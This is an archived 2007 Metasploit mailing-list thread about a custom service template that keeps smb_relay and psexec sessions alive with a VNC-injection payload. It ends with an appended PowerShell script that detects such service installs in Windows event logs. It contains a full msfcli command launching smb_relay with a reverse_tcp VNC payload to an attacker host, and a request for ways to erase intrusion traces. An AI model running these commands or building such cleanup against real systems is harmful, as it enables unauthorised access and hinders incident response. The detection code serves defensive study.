Metasploit mailing list archives
Re: smb_relay and vncinject
From: sigtrap at sigtrap.org (sigtrap)
Date: Wed, 21 Nov 2007 14:24:50 +0100
Hi,

I now have a new "service template.exe". I managed to steal 10 minutes from my friend Magnus Br?ding, in which he threw together a service executable template PoC (yes, we're sorry it's bloated :-)). It's attached with the password: "password" (without the quotes). Got it? ;-)

If you back up the original template.exe and use this instead, the exploits psexec and smb_relay will work as intended (other exploits, that don't expect a service exe, probably won't work). E.g.:

./msfcli windows/smb/smb_relay DisableCourtesyShell=1 LHOST=169.254.133.7 PAYLOAD=windows/vncinject/reverse_tcp EXITFUNC=process E

The service is created and starts. The payload is executed in a new thread. The service controller *doesn't* kill the process after 30 seconds anymore, as it does with the normal template.exe. When you terminate the vncclient the payload terminates the process through the "EXITFUNC=process". The Windows service MMC snap-in will now report the created service as "stopped".

If we could now just make the handler (i.e. the one that starts the VNC client on the attacking computer) report back to the exploit when the payload on the victim computer has ended (and thus its process has also terminated in this case), it would be easy to remove the service and executable on the victim computer, thereby leaving no bigger trace behind of the intrusion. I don't know how to do this, but it would be really great if someone did.

Regards
//Sigtrap

-----Original Message-----
From: H D Moore <hdm at metasploit.com>
To: framework at metasploit.com
Date: Mon, 10 Sep 2007 10:26:01 -0500
Subject: Re: [framework] Re: smb_relay and vncinject
Patrick nailed it. The SCM seems to be unhappy if the service start function doesn't return. To resolve this, we need to spawn a new thread from within the wrapper exe and return a successful result back. Is anyone familiar with writing EXE-based Windows services?

-HD

On Monday 10 September 2007 09:49, Patrick Webster wrote:
> It would appear that Windows is killing your VNC service after 30 seconds because the service did not return a successful start signal back to the OS within this period.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: template.exe.bin.pgp
Type: application/octet-stream
Size: 224107 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20071121/5de116d9/attachment.obj>
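The thread above describes two things a defender can look for on a Windows host: a service whose executable was dropped and registered remotely (the psexec/smb_relay pattern), and the Service Control Manager killing a service that did not report a successful start within 30 seconds. The following PowerShell is an added example written for this archive page; it is not code from the thread, from Metasploit, or from the attached template. It reads the System event log (7045 for service installs, 7000/7009 for start failures and connect timeouts), applies a few illustrative heuristics to the install records, and correlates flagged services with SCM timeout events. The heuristics, thresholds and the constructed sample record are my assumptions, not facts from the page.

```powershell
# Added example (not from the thread): flag recent service installs that look like
# remotely dropped service executables and check whether the SCM logged a start
# timeout for them. Assumptions: rights to read the System log; heuristics are
# illustrative, not a complete detection rule set.

function Get-ServiceInstallRecords {
    param([datetime]$Since = (Get-Date).AddDays(-7))
    # 7045 = "A service was installed in the system"; fields are taken from the event XML
    # so the code does not depend on the rendered message text.
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                ServiceName = $data['ServiceName']
                ImagePath   = $data['ImagePath']
                StartType   = $data['StartType']
                Account     = $data['AccountName']
            }
        }
}

function Test-SuspiciousServiceInstall {
    [CmdletBinding()]
    param([Parameter(Mandatory, ValueFromPipeline)]$Record)
    process {
        $reasons = @()
        $path = [string]$Record.ImagePath
        # Binary served straight from a share rather than from a local install directory.
        if ($path -match '^\\\\') { $reasons += 'UNC image path' }
        # Bare executable with a short random-looking name in the Windows or Temp directory
        # (an ADMIN$ drop lands in %SystemRoot%). The name-length bounds are an assumption.
        if ($path -match '(?i)(%SystemRoot%|\\Windows|\\Temp)\\[A-Za-z0-9]{4,12}\.exe$') {
            $reasons += 'short random-looking name in a system/temp directory'
        }
        # One-shot tools are typically registered as demand-start services running as SYSTEM.
        if ($Record.StartType -match 'demand' -and $Record.Account -match 'LocalSystem') {
            $reasons += 'demand-start service as LocalSystem'
        }
        [pscustomobject]@{
            Time        = $Record.Time
            ServiceName = $Record.ServiceName
            ImagePath   = $path
            Suspicious  = ($reasons.Count -ge 2)   # require two independent indicators
            Reasons     = ($reasons -join '; ')
        }
    }
}

function Get-ServiceStartTimeouts {
    param([Parameter(Mandatory)][string]$ServiceName, [datetime]$Since = (Get-Date).AddDays(-7))
    # 7009: timeout while waiting for the service to connect (the 30-second kill);
    # 7000: the service failed to start. Matching on the rendered message avoids
    # depending on parameter order inside the event XML.
    Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7000, 7009; StartTime = $Since } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -like "*$ServiceName*" } |
        Select-Object TimeCreated, Id, Message
}

# Constructed sample record (not a real event) so the heuristic can be exercised offline.
$sample = [pscustomobject]@{
    Time        = Get-Date
    ServiceName = 'XyzQwErTy'
    ImagePath   = '%SystemRoot%\XyzQwErTy.exe'
    StartType   = 'demand start'
    Account     = 'LocalSystem'
}
$sample | Test-SuspiciousServiceInstall | Format-List

# Live run on this host: list flagged installs and any SCM start timeouts recorded for them.
Get-ServiceInstallRecords | Test-SuspiciousServiceInstall | Where-Object Suspicious | ForEach-Object {
    $_
    Get-ServiceStartTimeouts -ServiceName $_.ServiceName
}
```

Running the constructed sample marks it suspicious on two indicators (random-looking name under %SystemRoot%, demand-start as LocalSystem). On a real host, a flagged 7045 record that is followed by a 7009 for the same service name is the exact trace of the behaviour Patrick and HD discuss: the SCM waited for the start handshake, did not get it, and terminated the process; a flagged record with no timeout and a service now in the "stopped" state matches the working template sigtrap describes, where the service and its executable are left behind.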